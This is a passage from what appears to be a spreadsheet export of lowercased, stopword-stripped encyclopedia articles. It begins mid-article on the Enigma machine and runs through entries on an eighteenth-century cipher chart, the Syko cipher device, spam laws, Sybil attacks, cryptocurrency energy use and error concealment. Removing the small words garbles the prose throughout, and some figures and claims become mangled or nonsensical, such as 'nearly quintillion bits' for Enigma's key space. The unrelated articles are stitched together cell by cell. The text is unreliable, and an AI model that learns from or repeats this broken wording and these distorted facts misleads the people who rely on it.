need second operator read lamps transcribe letters. schreibmax placed enigma machine connected lamp panel. install printer, lamp cover light bulbs removed. improved convenience operational security; printer could installed remotely signal officer operating machine longer decrypted plaintext. fernlesegerät another accessory remote lamp panel fernlesegerät. machines equipped extra panel, wooden case enigma wider could store extra panel. lamp panel version could connected afterwards, required, schreibmax, lamp panel light bulbs removed. remote panel made possible person read decrypted plaintext without operator seeing 1944, luftwaffe introduced plugboard switch, called (clock), small containing switch positions. replaced standard plugs. after connecting plugs, determined daily sheet, operator turned switch positions, producing different combination plug wiring. most plug connections were, unlike default plugs, pair-wise. switch position, swap letters, simply emulated stecker wires plugs. mathematical analysis enigma transformation letter specified mathematically product permutations. assuming three-rotor german army/air force enigma, denote plugboard transformation, denote reflector, denote left, middle right rotors respectively. then encryption expressed {\displaystyle e=prmlul^{-1}m^{-1}r^{-1}p^{-1}.} after press, rotors turn, changing transformation. example, right-hand rotor rotated positions, transformation becomes {\displaystyle \rho ^{n}r\rho ^{-n},} cyclic permutation mapping forth. similarly, middle left-hand rotors represented rotations encryption transformation described {\displaystyle e=p\left(\rho ^{n}r\rho ^{-n}\right)\left(\rho ^{j}m\rho ^{-j}\right)\left(\rho ^{k}l\rho ^{-k}\right)u\left(\rho ^{k}l^{-1}\rho ^{-k}\right)\left(\rho ^{j}m^{-1}\rho ^{-j}\right)\left(\rho ^{n}r^{-1}\rho ^{-n}\right)p^{-1}.} combining three rotors five, rotor settings positions, plugboard pairs letters connected, military enigma 158,962,555,217,826,360,000 different settings (nearly quintillion bits). operation basic operation german enigma operator would given plaintext message encrypt. after setting machine, would type message enigma keyboard. letter pressed, lamp indicating different letter according pseudo-random substitution determined electrical pathways inside machine. letter indicated lamp would recorded, typically second operator, cyphertext letter. action pressing also moved rotors next press used different electrical pathway, thus different substitution would occur even plaintext letter entered again. press rotation least right hand rotor less often two, resulting different substitution alphabet used every letter message. this process continued message completed. cyphertext recorded second operator would transmitted, usually radio morse code, operator another enigma machine. this operator would type cyphertext long settings deciphering machine identical enciphering machine every press reverse substitution would occur plaintext message would emerge. details use, enigma required list daily settings auxiliary documents. german military practice, communications divided separate networks, using different settings. these communication nets termed keys bletchley park, assigned code names, red, chaffinch, shark. each unit operating network given settings list enigma, valid period time. procedures german naval enigma elaborate secure services employed auxiliary codebooks. navy codebooks printed red, water-soluble pink paper could easily destroyed endangered vessel sunk. enigma machine's setting (its cryptographic modern terms; schlüssel german) specified operator-adjustable aspect machine: wheel order (walzenlage) choice rotors order fitted. ring settings (ringstellung) position alphabet ring relative rotor wiring. plug connections (steckerverbindungen) pairs letters plugboard connected together. late versions, wiring reconfigurable reflector. starting position rotors (grundstellung) chosen operator, different message.for message correctly encrypted decrypted, sender receiver configure enigma way; rotor selection order, ring positions, plugboard connections starting rotor positions must identical. except starting positions, settings established beforehand, distributed lists changed daily. example, settings 18th month german luftwaffe enigma list number (see image) follows: wheel order: ring settings: plugboard connections: reconfigurable reflector wiring: indicator groups: rxnenigma designed secure even rotor wiring known opponent, although practice considerable effort protected wiring configuration. wiring secret, total number possible configurations calculated around 3×10114 (approximately bits); known wiring operational constraints, reduced around 1023 bits). because large number possibilities, users enigma confident security; feasible adversary even begin brute-force attack. indicator most kept constant time period, typically day. different initial rotor position used message, concept similar initialisation vector modern cryptography. reason encrypting many messages identical near-identical settings (termed cryptanalysis depth), would enable attack using statistical procedure friedman's index coincidence. starting position rotors transmitted ciphertext, usually enciphered. exact method used termed indicator procedure. design weakness operator sloppiness indicator procedures main weaknesses made cracking enigma possible. earliest indicator procedures enigma cryptographically flawed allowed polish cryptanalysts make initial breaks plugboard enigma. procedure operator machine accordance secret settings operators shared. settings included initial position rotors (the grundstellung), say, aoh. operator turned rotors visible rotor windows. point, operator chose arbitrary starting position message would send. operator might select ein, became message setting encryption session. operator typed machine twice, producing encrypted indicator, example xhtloa. this transmitted, point operator would turn rotors message settings, example, type plaintext message. receiving end, operator machine initial settings (aoh) typed first letters message (xhtloa). example, einein emerged lamps, operator would learn message setting sender used encrypt message. receiving operator would rotors ein, type rest ciphertext, deciphered message. this indicator scheme weaknesses. first, global initial position (grundstellung) meant message keys used polyalphabetic substitution. later indicator procedures, operator selected initial position encrypting indicator sent initial position clear. second problem repetition indicator, serious security flaw. message setting encoded twice, resulting relation first fourth, second fifth, third sixth character. these security flaws enabled polish cipher bureau break pre-war enigma system early 1932. early indicator procedure subsequently described german cryptanalysts "faulty indicator technique".during world codebooks used rotors, ring settings plugboard. message, operator selected random start position, let's wza, random message key, perhaps sxt. moved rotors start position encoded message sxt. assume result uhl. message key, sxt, start position encrypted message. next, transmitted start position, wza, encoded message key, uhl, ciphertext. receiver start position according first trigram, wza, decoded second trigram, uhl, obtain message setting. next, used message setting start position decrypt message. this way, ground setting different procedure avoided security flaw double encoded message settings.this procedure used wehrmacht luftwaffe only. kriegsmarine procedures sending messages enigma complex elaborate. prior encryption message encoded using kurzsignalheft code book. kurzsignalheft contained tables convert sentences four-letter groups. great many choices included, example, logistic matters refuelling rendezvous supply ships, positions grid lists, harbour names, countries, weapons, weather conditions, enemy positions ships, date time tables. another codebook contained kenngruppen spruchschlüssel: identification message key. additional details army enigma machine used alphabet characters. punctuation replaced rare character combinations. space omitted replaced generally used full-stop. some punctuation marks different parts armed forces. wehrmacht replaced comma question mark frage fraq. kriegsmarine replaced comma question mark combination "acht" (eight) "richtung" (direction), replaced (aqt, riqtung). two, three four zeros replaced centa, mille myria. wehrmacht luftwaffe transmitted messages groups five characters. kriegsmarine, using four rotor enigma, four-character groups. frequently used names words varied much possible. words like minensuchboot (minesweeper) could written minensuchboot, minboot, mmmboot mmm354. make cryptanalysis harder, messages limited characters. longer messages divided several parts, using different message key. example enciphering process character substitutions enigma machine whole expressed string letters position occupied character replace character corresponding position alphabet. example, given machine configuration enciphered ..., could represented compactly lushqoxdmznaikfrepcybwvgtj enciphering particular character configuration could represented highlighting enciphered character lus(h)qoxdmznaikfrepcybwvgtj since operation enigma machine enciphering message series configurations, associated single character enciphered, sequence representations used represent operation machine enciphers message. example, process enciphering first sentence main body famous "dönitz message" rbbf pmhp hgcz xtdy gahg ufxg ewkb lkgj represented 0001 kgwnt(r)blqpahydvjifxezocsmu cdtk 0002 uorytqslwxzhnm(b)vfcgeapijdk cdtl 0003 hlnrskjamgf(b)icuqpdeyozxwtv cdtm 0004 kptxig(f)mesauhyqbovjclrzdnw cdun 0005 xdyb(p)wosmuzriqgenlhvjtfack cduo 0006 dliajuovcexbn(m)gqpwzyfhrkts cdup 0007 lus(h)qoxdmznaikfrepcybwvgtj cduq 0008 jkgo(p)tcihabrnmdeylzfxwvuqs cdur 0009 gcbuzrasyxvmlpqnof(h)wdktjie cdus 0010 xpjuowiy(g)cvrtqebnlzmdkfahs cdut 0011 disauyombpnthkgjrq(c)lezxwfv cduu 0012 fjlvqakxnbgcpirmeoy(z)wduhst cduv 0013 ktjuqonpzcamlgfhew(x)bdyrsvi cduw 0014 zqxuvgfnwrlkph(t)mbjyodeicsa cdux 0015 xjwfr(d)zsqblktvpoiehmyncaug cduy 0016 fsktjarxpecnul(y)izgbdmwvhoq cduz 0017 ceakbmryuvdnfltxw(g)zoijqphs cdva 0018 tljrvqhgucxbzyswfdo(a)iepknm cdvb 0019 y(h)lpgtebkwicsvudrqmfonjzax cdvc 0020 krul(g)jewnfadvipoybxzcmhsqt cdvd 0021 rcbpqmvzxy(u)ofsldeanwkgtijh cdve 0022 (f)cbjqawtvdynxlusezphoigmkr cdvf 0023 vftqsbporuzwy(x)hgdiecjalnmk cdvg 0024 jsrhfenduazyq(g)xtmcbpiwvolk cdvh 0025 rcbutxvzjinqpkwmlay(e)dgofsh cdvi 0026 urfxncmylvpigesktboqajzdh(w) cdvj 0027 jiozfewmbaushpcnrqlv(k)tgyxd cdvk 0028 zgvrko(b)xlneiwjfusdqypcmhta cdvl 0029 rmjv(l)yqzkciebonugawxpdstfh cdvm 0030 g(k)qrfeanzpbmlhvjcduxsoytwi cdwn 0031 ymzt(g)vekqohpbsjliundrfxwac cdwo 0032 pdsbtiuqfnovw(j)kahzceglmyxr cdwp letters following mapping letters appear windows stage (the state changes visible operator) numbers show underlying physical position rotor. character mappings given configuration machine turn result series mappings applied pass component machine: enciphering character resulting application given component's mapping serves input mapping subsequent component. example, step enciphering expanded show stages using representation mappings highlighting enciphered character: abcdef(g)hijklmnopqrstuvwxyz efmqab(g)uinkxcjordpzthwvlys ae.bf.cm.dq.hu.jn.lx.pr.sz.vw ofrjvm(a)zhqnbxpykculgswetdi viii (n)ukchvsmdgtzqfyewpialoxrjb xjmiyvcarqowh(l)ndsufkgbepzt qungalxepkz(y)rdsoftvcmbihwj rdobjntkvehmlfcwzaxgyips(u)q evtnhqdxwzjfucpiamor(b)syglk h(v)gpwsumdbtncokxjiqzrflaey tzdipnjesycuhavrmxgkb(f)qwol glqyw(b)tizdpsfkanjcuxrevmoh viii e(f)mqabguinkxcjordpzthwvlys ae.bf.cm.dq.hu.jn.lx.pr.sz.vw kptxig(f)mesauhyqbovjclrzdnw here enciphering begins trivially first "mapping" representing keyboard (which effect), followed plugboard, configured ae.bf.cm.dq.hu.jn.lx.pr.sz.vw effect 'g', followed viii rotor position, maps rotor position, maps ..., finally plugboard again, maps producing overall mapping indicated final step: note model rotors (lines reflector (line also permutes (garbles) letters. models enigma family included multiple designs. earliest commercial models dating early 1920s. starting mid-1920s, german military began enigma, making number security-related changes. various nations either adopted adapted design cipher machines. estimated 40,000 enigma machines constructed. after world allies sold captured enigma machines, still widely considered secure, developing countries. commercial enigma february 1918, arthur scherbius applied patent ciphering machine used rotors. scherbius richard ritter founded firm scherbius ritter. they approached german navy foreign office design, neither agency interested. scherbius ritter assigned patent rights gewerkschaft securitas, founded chiffriermaschinen aktien-gesellschaft (cipher machines stock corporation) july 1923; scherbius ritter board directors. enigma handelsmaschine (1923) chiffriermaschinen began advertising rotor machine, enigma handelsmaschine, exhibited congress international postal union 1924. machine heavy bulky, incorporating typewriter. measured 65×45×38 weighed kilograms (110 lb). schreibende enigma (1924) this also model type writer. there number problems associated printer construction stable 1926. both early versions enigma lacked reflector switched chiffering dechiffering. glühlampenmaschine, enigma (1924) reflector, suggested scherbius' colleague willi korn, introduced glow lamp version. machine also known military enigma. rotors manually rotatable reflector. typewriter omitted glow lamps used output. operation somewhat different later models. before next pressure, operator press button advance right rotor step. enigma (1924) enigma model introduced late 1924, similar construction. while bearing enigma name, models quite unlike later versions: they differed physical size shape, also cryptographically, lacked reflector. this model enigma machine referred glowlamp enigma glühlampenmaschine since produced output lamp panel rather paper. this method output much reliable cost effective. hence machine 1/8th price predecessor. enigma (1926) model third model so-called ″glowlamp enigmas″ (after lacked typewriter. enigma (1927) enigma quickly gave enigma (1927). this version widely used, shipments sweden, netherlands, united kingdom, japan, italy, spain, united states poland. 1927 hugh foss british government code cypher school able show commercial enigma machines could broken, provided suitable cribs available. soon, enigma would pioneer standard keyboard layout used german computing. this "qwertz" layout similar american qwerty keyboard format used many languages. "navy cipher other countries used enigma machines. italian navy adopted commercial enigma "navy cipher spanish also used commercial enigma machines civil war. british codebreakers succeeded breaking machines, lacked plugboard. enigma machines also used diplomatic services. enigma (1929) there also large, eight-rotor printing model, enigma called enigma reichswehr. 1933 polish cipher bureau detected high-level military communication, soon withdrawn, unreliable jammed frequently. enigma swiss used version enigma called model swiss military diplomatic use, similar commercial enigma machine's code cracked poland, france, united kingdom united states; latter code-named indigo. enigma model, code-named tirpitz, used japan. military enigma various services wehrmacht used various enigma versions, replaced frequently, sometimes ones adapted services. enigma seldom carried high-level strategic messages, urgent went courier, urgent went cryptographic systems including geheimschreiber. funkschlüssel reichsmarine first military branch adopt enigma. this version, named funkschlüssel ("radio cipher c"), production 1925 introduced service 1926.the keyboard lampboard contained letters a-z, arranged alphabetically, opposed qwertzui ordering. rotors contacts, letter wired bypass rotors unencrypted. three rotors chosen five reflector could inserted four different positions, denoted machine revised slightly july 1933. enigma (1928–1930) july 1928, german army (reichswehr) introduced exclusive version enigma machine, enigma abwehr used enigma (the abwehr enigma). this enigma variant four-wheel unsteckered machine multiple notches rotors. this model equipped counter incremented upon press, also known "counter machine" zählwerk enigma. wehrmacht enigma (1930–1938) enigma machine modified enigma june 1930. enigma also known wehrmacht, "services" enigma, used extensively german military services government organisations (such railways) world major difference enigma (german army version 1930), commercial enigma models addition plugboard swap pairs letters, greatly increasing cryptographic strength. other differences included fixed reflector relocation stepping notches rotor body movable letter rings. machine measured (11.0 13.4 weighed around lb).in august 1935, force introduced wehrmacht enigma communications. (1934) 1930, reichswehr suggested navy adopt machine, citing benefits incre</t>
  </si>
  <si>
    <t>Syllabical and Steganographical Table</t>
  </si>
  <si>
    <t>syllabical steganographical table (french: tableau syllabique stéganographique) eighteenth-century work. believed first cryptography chart made. author work written p.r. wouves. thought philadelphia book dealer w.d. witt author's name play words pseudonym benjamin franklin. thought "p.r" stood poor richard, pseudonym franklin used "richard saunders" author poor richard's almanack. franklin reputation using ciphers codes secret communications. printer work developed benjamin franklin bache, grandson benjamin franklin. description work pages chart. pages title pages english french. printed back pages information instructions chart within. this chart consisted large single sheet paper table. contained alphabetical columns 6,138 two-letter combinations, numbered words could translated numbers. table chart sheet normally kept folded carrying around. folded chart opened using, would folded road map.the chart table used code message kept secret others except recipient. cipher system. idea behind anything written latin alphabet could numerical code numbers. initially english french could also used spanish, portuguese, dutch, italian. wouves's chart secret correspondence method intended certain closest friends. working steganography. initial preliminary table printed 1797 partial work. there never official printed edition total completed work. characteristics sheet chart table open inches (690 wide 19.25 inches (489 deep. copyright pennsylvania district number issued author "p.r. wouves" november 1787. according army cryptographer william friedman table significant historical importance represents. references citations sources kane, joseph nathan (1997). famous first facts: record first happenings, discoveries inventions united states, fifth edition. wilson. isbn 0-8242-0930-3. first cryptography chart p.r. wouves’s syllabical steganographical table, chart 19.25 inches, list syllables words english french intended secret correspondence.</t>
  </si>
  <si>
    <t>Syko Cipher Device</t>
  </si>
  <si>
    <t>syko cipher device compact british cipher apparatus world invented patented morgan o'brien war. o'brien developed sophisticated cipher typewriter, complex delicate, came relatively simple device adopted military known syko. although german crypt analysts managed break syko code, remained much quick method low-level encoding radio traffic, particularly aircraft. code breaking took considerable time plus sufficient sample messages, certain classes radio traffic (such aircraft's position) decoded information became available many hours later little value. description syko machine purely mechanical device. details mechanical construction found patent 534615 (morgan o'brien o'brien cipher machines ltd, london) robust, small, lightweight, fitted brown hardcover case, optional canvas outer bag. machines survive, operating instructions issued royal australian force november 1940 made available on-line.when grey cover opened reveals vertical columns letters. each column characters reading downwards followed pause character characters all). these columns moveable endless band. syko case contains propelling pencil small brass end, inserted notch letter allowing columns moved required. device requires code card day. this placed within machine revealed columns moved down. code card contains columns symbols, column characters moveable columns random order. code cards different day, usually aircraft carried card day. event events dictated flight unexpectedly went past midnight provision sending code indicate using earlier days card. characters code card paired column pairs) leaving single character unpaired. pairing means that, example, codes 'r', codes 'c'. there chance character un-paired character code itself. bottom cover device slid reset columns top. encoding involves taking special pencil and, column turn, selecting corresponding letter message using pencil brass draw moveable column letter bottom thus revealing code card underneath. encoded message lower-most symbol visible code card (i.e. moveable column). original message still visible along bottom bar, check column placement moved. pairing characters outlined above, decoding messages follows process, essential parties using coding card. avoid confusion similar letters code card, lower case, zero line lower case. reciprocal codes (e.g. codes codes limited variations possible, july 1942 non-reciprocal codes syko nyko introduced. this meant turning code card changing coding decoding, make code significantly harder break. history morgan o'brien filed several patents living zealand related burglar alarms security tills shops. around 1925 came england wife (via vancouver montreal), realised long distance telegraph communication transformed links parts empire, message information private letters business opportunity technique coding messages. around 1927 british military also considering problems using unencrypted radio messages 1928 established wireless messages committee look issues.it 1928 morgan o'brien patented cipher typewriter. this machine described britain's enigma machine detailed account evaluation military experts.morgan o'brien continued develop cipher typewriter least 1935 issued patent, possibly reaction problems brought complex machine came device become known syko, patented 1939. this adopted, september 1939 evidenced traffic control ronaldsway september 1939 records ministry controller taking taking possession syko cards.an admiralty document november 1945, formerly secret, declassified, reviews naval codes ciphers used also gives insight usage syko raf. this shows syko device first distributed navy early 1939, navy peacetime code cards. start naval cards cards brought use, followed early 1940 inter-service cards. first years navy used syko naval cards standard low-grade system communication vessels auxiliary minesweepers, anti-submarine craft, examination vessels, harbour defence vessels, mtbs, none carried high grade code capability. this replaced small ships code august 1941 (s.p. 02383) known prefix loxo. implied change admiralty document states non-reciprocal code cards introduced july 1942, states still 02266 june 1943. april 1942 another special series cards introduced aircraft operating north atlantic, solely shore-based aircraft operating gibraltar (i.e. coastal command operations protect convoys). july 1942 marked introduction non-reciprocal cards improve security. july 1943 coastal command dropped usage syko, instead using aircraft reporting code (s.p. 2488). naval aircraft continued skyo code naval cards 1944, time admiralty report written (late 1945) naval version syko (nyko) still carrier-borne aircraft small craft. with several sets cards occasions vessel would need one, evident report loss khartoum june 1940, accounts list syko machine, instructions syko machine, naval syko cards.this complex series releases different code cards appear used syko device little modification however admiralty report march 1942 syko devices short supply, "rekoh" cases issued syko cards place. syko device used aircraft communications least june 1944 (from operations logs, e.g. squadron record operations). small number syko devices survived private collections museums, solway aviation museum syko cipher device display. references external links crypto museum jerry proc crypto machines</t>
  </si>
  <si>
    <t>Email spam legislation by country</t>
  </si>
  <si>
    <t>following table represents laws respective countries jurisdictions restrict email spam. note: countries jurisdictions marked listed spamhaus' worst spam origin countries (march 2020). also email spam spamming coalition against unsolicited commercial email (cauce) list countries number internet users references external links piercing corporate veil corporate groups</t>
  </si>
  <si>
    <t>Sybil attack</t>
  </si>
  <si>
    <t>sybil attack type attack computer network service attacker subverts service's reputation system creating large number pseudonymous identities uses gain disproportionately large influence. named subject book sybil, case study woman diagnosed dissociative identity disorder. name suggested 2002 brian zill microsoft research. term pseudospoofing previously coined detweiler cypherpunks mailing list used literature peer-to-peer systems class attacks prior 2002, term gain much influence "sybil attack". description sybil attack computer security attack wherein reputation system subverted creating multiple identities. reputation system's vulnerability sybil attack depends cheaply identities generated, degree reputation system accepts inputs entities chain trust linking trusted entity, whether reputation system treats entities identically. 2012, evidence showed large-scale sybil attacks could carried cheap efficient extant realistic systems bittorrent mainline dht.an entity peer-to-peer network piece software access local resources. entity advertises peer-to-peer network presenting identity. more identity correspond single entity. words, mapping identities entities many one. entities peer-to-peer networks multiple identities purposes redundancy, resource sharing, reliability integrity. peer-to-peer networks, identity used abstraction remote entity aware identities without necessarily knowing correspondence identities local entities. default, distinct identity usually assumed correspond distinct local entity. reality, many identities correspond local entity. adversary present multiple identities peer-to-peer network order appear function multiple distinct nodes. adversary thus able acquire disproportionate level control network, affecting voting outcomes. context (human) online communities, multiple identities sometimes known sockpuppets. example notable sybil attack conjunction traffic confirmation attack launched anonymity network several months 2014.there examples sybil attacks network users. this includes 2020 bitcoin address rewrite attacks. attacker controlled quarter exit relays employed stripping downgrade secure connections divert funds wallet threat actor known btcmitm20.another notable example 2017–2021 attack threat actor kax17. this entity controlled malicious servers, primarily middle points, attempt deanonymize users. prevention known approaches sybil attack prevention include identity validation, social trust graph algorithms, economic costs, personhood validation, application-specific defenses. identity validation validation techniques used prevent sybil attacks dismiss masquerading hostile entities. local entity accept remote identity based central authority ensures one-to-one correspondence identity entity even provide reverse lookup. identity validated either directly indirectly. direct validation local entity queries central authority validate remote identities. indirect validation local entity relies already-accepted identities turn vouch validity remote identity question. practical network applications services often variety identity proxies achieve limited sybil attack resistance, telephone number verification, credit card verification, even based address client. these methods limitations usually possible obtain multiple identity proxies cost even obtain many cost techniques spoofing address spoofing. identity proxies also exclude without ready access required identity proxy: e.g., without mobile phone credit card, users located behind carrier-grade network address translation share addresses many others. identity-based validation techniques generally provide accountability expense anonymity, undesirable tradeoff especially online forums wish permit censorship-free information exchange open discussion sensitive topics. validation authority attempt preserve users' anonymity refusing perform reverse lookups, approach makes validation authority prime target attack. protocols using threshold cryptography potentially distribute role validation authority among multiple servers, protecting users' anonymity even limited number validation servers compromised. social trust graphs sybil prevention techniques based connectivity characteristics social graphs also limit extent damage caused given sybil attacker preserving anonymity. examples prevention techniques include sybilguard, sybillimit, advogato trust metric, sybilrank, sparsity based metric identify sybil clusters distributed based reputation system.these techniques cannot prevent sybil attacks entirely, vulnerable widespread small-scale sybil attacks. addition, clear whether real-world online social networks satisfy trust connectivity assumptions algorithms assume. economic costs alternatively, imposing economic costs artificial barriers entry used make sybil attacks expensive. proof work, example, requires user prove expended certain amount computational effort solve cryptographic puzzle. bitcoin related permissionless cryptocurrencies, miners compete append blocks blockchain earn rewards roughly proportion amount computational effort invest given time period. investments resources storage stake existing cryptocurrency similarly used impose economic costs. personhood validation alternative identity verification attempts maintain strict "one-per-person" allocation rule, validation authority mechanism knowledge user's real identity verification unidentified person's physical presence particular place time pseudonym party enforce one-to-one correspondence online identities real-world users. such proof personhood approaches proposed basis permissionless blockchains cryptocurrencies human participant would wield exactly vote consensus. variety approaches proof personhood proposed, deployed implementations, although many usability security issues remain. application-specific defenses number distributed protocols designed sybil attack protection mind. sumup dsybil sybil-resistant algorithms online content recommendation voting. whānau sybil-resistant distributed hash table algorithm. i2p's implementation kademlia also provisions mitigate sybil attacks. also astroturfing ballot stuffing social sockpuppetry references external links querci, daniele; hailes, stephen (2010). "sybil attacks against mobile users: friends foes rescue". 2010 proceedings ieee infocom. 1–5. citeseerx 10.1.1.360.8730. doi:10.1109/infcom.2010.5462218. isbn 978-1-4244-5836-3. s2cid 2451937. bazzi, rida konjevod, goran (2006). establishment distinct identities overlay networks". distributed computing. (4): 267–87. doi:10.1007/s00446-006-0012-y. s2cid 2723075. lesniewski-laas, chris (2008). sybil-proof one-hop dht". proceedings workshop social network systems socialnets '08. 19–24. doi:10.1145/1435497.1435501. isbn 978-1-60558-124-8. s2cid 5793502. newsome, james; shi, elaine; song, dawn; perrig, adrian (2004). "the sybil attack sensor networks". proceedings third international symposium information processing sensor networks ipsn'04. 259–68. doi:10.1145/984622.984660. isbn 978-1581138467. s2cid 12451248. survey solutions sybil attack network formation: sybil attacks reputation systems seigneur, jean-marc; gray, alan; jensen, christian damsgaard (2005). "trust transfer: encouraging self-recommendations without sybil attack". trust management. lecture notes computer science. vol. 3477. 321–37. citeseerx 10.1.1.391.5003. doi:10.1007/11429760_22. isbn 978-3-540-26042-4. survey security techniques guido urdaneta, guillaume pierre maarten steen. computing surveys, 2009. experiment weakness reputation algorithms used professional social networks: case naymz marco lazzari. proceedings iadis international conference e-society 2010.</t>
  </si>
  <si>
    <t>Environmental impact of cryptocurrencies</t>
  </si>
  <si>
    <t>cryptocurrencies rely proof work technology, notably bitcoin ethereum, criticized amount electricity consumed mining. this greater interest cryptocurrencies proof stake. bitcoin energy consumption 2022, cambridge centre alternative finance (ccaf) estimates bitcoin consumes annually, representing 0.29% world's energy production 0.59% world's electricity production, ranking bitcoin mining ukraine egypt terms electricity consumption.george kamiya, writing international energy agency, said "predictions bitcoin consuming entire world's electricity" sensational, area "requires careful monitoring rigorous analysis". study michael novogratz's galaxy digital, cryptocurrency investment firm, claimed bitcoin mining used less energy traditional banking system. sources energy until 2021, according ccaf, much mining bitcoin done china. chinese miners relied cheap coal power xinjiang late autumn, winter spring, migrated regions overcapacities low-cost hydropower, like sichuan, october. june 2021 china banned bitcoin mining miners moved countries. december 2021, global computational capacity mostly recovered level china's crackdown, mining done u.s. (35.4%), kazakhstan (18.1%), russia (11%) instead.as september 2021, according york times, bitcoin's renewables ranged 75%. according bitcoin mining council, based survey global network, bitcoin mining used renewable energy resources 2021. however, experts government authorities suggested renewable energy mining limit availability clean energy ordinary uses general population. proof stake types networks while largest proof work (pow) blockchains bitcoin ethereum consume energy scale medium-sized countries, demand proof stake (pos) blockchains scale equivalent housing estate. various sources cited 2021 figures compiled datacentres texas energy kilowatt hours transaction: iota (0.00011); (0.0079); chia (0.023); dogecoin (0.12); cardano (0.5479); litecoin (18.522); bitcoin cash (18.957); ethereum (62.56); bitcoin (707). this identification "eco-friendly cryptocurrencies”: chia, iota, cardano, nano, solarcoin bitgreen.chia based proof space algorithm, uses less power relies storage devices, computer processing power. however, huge number hard discs needed produces considerable amounts electronic waste.academics researchers used various methods estimating energy energy efficiency blockchains. germany-based crypto carbon ratings institute (ccri) studied largest networks 2021. conclusions terms annual consumption (kwh/yr) were: polkadot (70,237), tezos (113,249), avalanche (489,311), algorand (512,671), cardano (598,755) solana (1,967,930). this equates polkadot consuming times electricity average u.s. home, cardano homes solana times much. research concluded networks consumed 0.001% electricity bitcoin network.the table summarises ccri results alongside research university college london (ucl). these sources give measure energy efficiency terms energy transaction. negative impact mining bitcoin carbon emissions concerns bitcoin's environmental impact relate network's energy consumption carbon emissions. difficulty translating energy consumption carbon emissions lies decentralized nature bitcoin impeding ability researchers identify miners geographically examine electricity used. results studies carbon footprint vary. 2018 study published nature climate change claimed bitcoin "could alone produce enough emissions push warming within less three decades." however, three later studies nature climate change dismissed analysis account poor methodology false assumptions study concluding: "[t]he scenarios used mora fundamentally flawed taken seriously public, researchers, policymakers." according studies published joule american chemical society 2019, bitcoin's annual energy consumption results annual carbon emission ranging 22.9 mtco2 comparable level emissions countries jordan lanka kansas city. however, academic studies report much broader range carbon footprint estimates. instance, according study published finance research letters 2021, differences underlying assumptions variation coverage time periods forecast horizons bitcoin carbon footprint estimates spanning 1.2-5.2 130.50 year. electronic waste researchers estimate electronic waste generated bitcoin mining devices amounts 30.7 metric kilotonnes annually 2021. consistent increase bitcoin network's hashrate, mining devices estimated average lifespan 1.29 years become unprofitable need replaced. mining devices based asic technology, standard hardware mining, specialized cannot repurposed another use, hence become electronic waste become unprofitable. efforts reduce impact mining some major cryptocurrencies trying implement technical measures reduce negative environmental impact. bitcoin developers working lightning network. reduce energy demand network moving transactions blockchain.ethereum working transition proof work proof-of-stake algorithm, used algorand, cardano, tezos, several years. claim would reduce network's energy demand 99%, though concerns risks network. possible remedies development intermittent renewable energy sources, wind power solar power, challenging cause instability electrical grid. several papers concluded renewable power stations could surplus energy mine bitcoin thereby reduce curtailment, hedge electricity price risk, stabilize grid, increase profitability renewable energy infrastructure, therefore accelerate transition sustainable energy decrease bitcoin's carbon footprint.some hydroelectric plants used mine bitcoin. according owners mechanicville hydroelectric plant, mining saved plant dismantlement.reversible computing chips hash recycling could possibly provide advantage bitcoin mining forms reduced energy usage e-waste, reversible computing still early stages. paper suggests starting research development reversible bitcoin mining chips also hash recycling providing entropy pseudorandom number generation. survey technologies approached cryptocurrencies' technological environmental issues many perspectives noted plans using methods unconventional computing grid computing make bitcoin ether greener justified. paper suggested climate-related criticism bitcoin primarily based network’s absolute carbon emissions, without considering market value. argues adding bitcoin diversified equity portfolio could reduce portfolio’s aggregate carbon footprint.some papers suggested cryptocurrencies blockchain applications might encourage transition circular economy. example, token reward models could used incentivize individuals recycle. references</t>
  </si>
  <si>
    <t>Swedish Commission on Security and Integrity Protection</t>
  </si>
  <si>
    <t>swedish commission security integrity protection (swedish: säkerhets- integritetsskyddsnämnden) swedish administrative authority sorting ministry justice responsible supervising enforcement agencies' secret surveillance techniques, assumed identities associated activities. commission also supervise processing personal data swedish police authority. also obliged check whether someone subject secret surveillance subject processing personal data, request individual, done within bounds applicable legislation. also swedish economic crime authority swedish police authority swedish security service references external links official website</t>
  </si>
  <si>
    <t>Error concealment</t>
  </si>
  <si>
    <t>error concealment technique used signal processing aims minimize deterioration signals caused missing data, called packet loss. signal message sent transmitter receiver multiple small packets. packet loss occurs packets misdirected, delayed, resequenced, corrupted. receiver-based techniques when error recovery occurs receiving signal, receiver-based. these techniques focus correcting corrupted missing data. waveform substitution preliminary attempts receiver-based error concealment involved packet repetition, replacing lost packets copies previously received packets. this function computationally simple performed device receiver called "drop-out compensator". zero insertion when technique used, packet lost, entries replaced interpolation interpolation involves making educated guesses nature missing packet. example, following speech patterns audio faces video. buffer data buffers used temporarily storing data waiting delayed packets arrive. they common internet browser loading bars video applications, like youtube. transmitter-based techniques rather attempting recover lost packets, techniques involve anticipating data loss, manipulating data prior transmission. retransmission simplest transmitter-based technique retransmission, sending message multiple times. although idea simple, extra time required send multiple signals, technique incapable supporting real-time applications. packet repetition packet repetition, also called forward error correction (fec), adds redundant data, receiver recover lost packets. this minimizes loss, increases size packet. interleaving interleaving involves scrambling data transmission. when packet lost, rather losing entire data, small portions several sets gone. receiving end, message deinterleaved reveal original message minimal loss. transmission without interleaving: original transmitted sentence: thisisnotanexampleofinterleaving received sentence burst error: thisisnot______pleofinterleaving term "anexample" ends mostly unintelligible difficult correct. with interleaving: transmitted sentence: thisisanexampleofinterleaving... error-free transmission: tiepfeaghsxlirv.iaaenli.snmoten. received sentence burst error: tiepfe______irv.iaaenli.snmoten. received sentence deinterleaving: t_isi_ane_amp_eofinterle_vin_... word completely lost missing letters recovered minimal guesswork. applications depending method transmission (analog digital), variety ways errors propagate message. analog applications since invention 1950s, magnetic coating used analog video tape experienced radio frequency (rf) signal drop-outs. some techniques used resolving issues analogous used concealing errors modern compressed video signals. process click removal audio restoration another example error concealment. closely analogous example domain image processing digital dust scratch removal processing film restoration. digital applications error concealment many digital applications, including browsing, video conferencing, skype, youtube also packet loss concealment references</t>
  </si>
  <si>
    <t>Suter (computer program)</t>
  </si>
  <si>
